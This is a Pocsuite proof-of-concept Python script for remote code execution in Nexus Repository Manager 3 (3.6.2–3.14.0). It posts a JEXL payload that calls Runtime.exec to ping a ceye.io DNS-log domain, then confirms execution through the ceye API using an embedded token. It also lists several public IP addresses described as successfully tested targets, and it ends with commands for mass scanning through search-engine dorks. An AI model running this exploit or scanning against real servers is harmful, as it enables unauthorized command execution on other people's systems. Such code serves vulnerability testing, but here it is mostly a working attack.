#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# 命令行

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
 
import random
from string import letters
 

# 基础基类.
class NexusManagerPOC(POCBase):
    vulID = '57'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2019-02-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-20'  # 编写 PoC 的日期
    updateDate = '2019-02-20'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 RCE'  # PoC 名称
    appPowerLink = ['https://support.sonatype.com/hc/en-us']  # 漏洞厂商主页地址
    appName = 'Nexus Repository Manager 3'  # 漏洞应用名称
    appVersion = '3.6.2 版本到 3.14.0 版本'  # 漏洞影响版本
    vulType = 'Nexus3 RCE'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Nexus Repository Manager 3 RCE
    '''  # 漏洞简要描述
    samples = ['http://59.110.218.218:8081','http://63.142.252.231:8081',
        'http://141.100.70.39:8083','http://202.106.93.10:8081']  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    # 指纹方法
    def _fingerprint(self):
        pass

    # 验证模块 pocsuite -r 1-redis.py -u 10.1.5.26 --verify
    def _verify(self):
        # 调用指纹方法
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        headers = {'Referer':''}
        import json
        j = {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}
        
        try:
            resp = req.post(target_url, json=j, headers=headers, timeout=1)
        except Exception as e:
            print(str(e))
        
        import time
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)

    # 验证DNS已被解析，命令执行
    def dnslog_sucess(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register(NexusManagerPOC)

"""
PoC 编写规范及要求说明 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md

使用方法 https://github.com/knownsec/Pocsuite/blob/master/docs/translations/USAGE-zh.md

集成 Pocsuite https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md

钟馗之眼 批量验证
pocsuite -r 1-redis-getshell.py --verify --dork "redis"  --max-page 50 --search-type host --report report.html
pocsuite -r 1-redis-getshell.py --verify -f results.txt --threads 10 --report report.html
"""


